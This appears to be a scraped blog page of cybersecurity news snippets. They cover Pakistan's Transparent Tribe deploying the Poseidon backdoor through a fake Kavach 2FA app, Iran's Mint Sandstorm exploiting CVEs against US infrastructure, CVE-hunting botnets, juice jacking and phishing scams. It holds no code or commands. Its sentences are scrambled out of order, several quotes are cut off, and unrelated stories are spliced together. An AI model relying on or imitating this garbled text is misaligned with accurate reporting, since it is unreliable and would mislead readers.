![]() Google: Ukraine targeted by 60% of Russian phishing attacks in 2023 "Meanwhile, the payload is downloaded in the background, compromising the user's system." "When a user interacts with the malicious version of Kavach, the genuine login page is displayed to distract them," Sandapolla explained. Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways." "It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe used a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon. Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies In some attacks, the subgroup uses PowerShell scripts for account enumeration and RDP connections and an SSH tunnel for command-and-control (C&C), to steal the victim’s Active Directory database, compromise user credentials, and access user accounts. They later exploited CVE-2022-47986 in Aspera Faspex within five days of the POC being made public on February 2, 2023,” Microsoft reports. “For example, Mint Sandstorm began exploiting CVE-2022-47966 in Zoho ManageEngine on January 19, 2023, the same day the POC became public. These attacks were “potentially in support of retaliatory destructive cyberattacks,” Microsoft said. Initially focused on performing reconnaissance, the subgroup transitioned to directly targeting critical infrastructure organizations in the United States in 2022, including energy companies, seaports, transit systems, and a major utility and gas company. The nation-state group is known as TA453, Ajax Security Team, Charming Kitten, APT35, Magic Hound, NewsBeef, Newscaster, and Phosphorus, and now Mint Sandstorm, per Microsoft’s updated threat actor naming taxonomy. World cyber Microsoft: Iranian Hackers Moved From Recon to Targeting US Critical Infrastructure Those just activate your basic emotions to make you click the bait, and it is very tempting to do so. That makes you wonder how many more theoretical threats can become reality and how we didn’t see it coming.Īnd finally in the news, emotional scams with compelling text such as, hi mom, hi dad, your package arrived, tax refund etc. A week ago, the FBI issue a warning on “Juice jacking” targeting Electric Vehicle charging station with malware infection. Typically, those hunting campaign begin few hours from publication trying to take advantage of the time it takes to patch the vulnerable systems.Īccording to Wikipedia : Juice jacking is a theoretical type of compromise of devices like phones and tablets which use the same cable for charging and data transfer, typically a USB cable. The concept is simple, find an un patch system and exploit it. They activate critical CVE hunting botnets that scan many sites for the specific critical CVE with active exploitation code. Cyber incidents with country level funding are all over the news.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |